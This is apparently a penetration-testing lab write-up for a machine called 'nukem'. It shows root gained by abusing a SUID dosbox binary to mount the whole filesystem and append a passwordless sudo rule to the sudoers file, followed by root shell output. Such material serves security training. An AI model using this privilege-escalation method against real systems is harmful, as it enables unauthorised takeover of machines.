Nukem_Privilege_Escalation

dosbox via VNC

---

Although there is nothing going on within the current VNC session, I will attempt to leverage the SUID dosbox binary that failed to spawn a shell earlier. dosbox is essentially a DOS emulator.

Starting the dosbox

The emulator is booted up and it’s currently set to the Z: drive

According to the official documentation of dosbox, it has a command, MOUNT, that can be used to mount a local directory to the emulated drive. Since, the /usr/bin/dosbox binary has SUID bits set, it would mean that it runs with privileges of the root account. Thus, I should be able to mount the entire filesystem to the emulator

MOUNT C: / Successfully mounted the entire filesystem to the C: drive

Switching to the C: drive and moving into the /root directory

sudoers

---

echo commanader ALL=(ALL) NOPASSWD: ALL >> ./sudoers Granting the sudo ALL privilege the commander user

[commander@nukem ~]$ sudo -i
[root@nukem ~]# whoami
root
[root@nukem ~]# hostname
nukem
[root@nukem ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:97:60 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.113.105/24 brd 192.168.113.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:9760/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise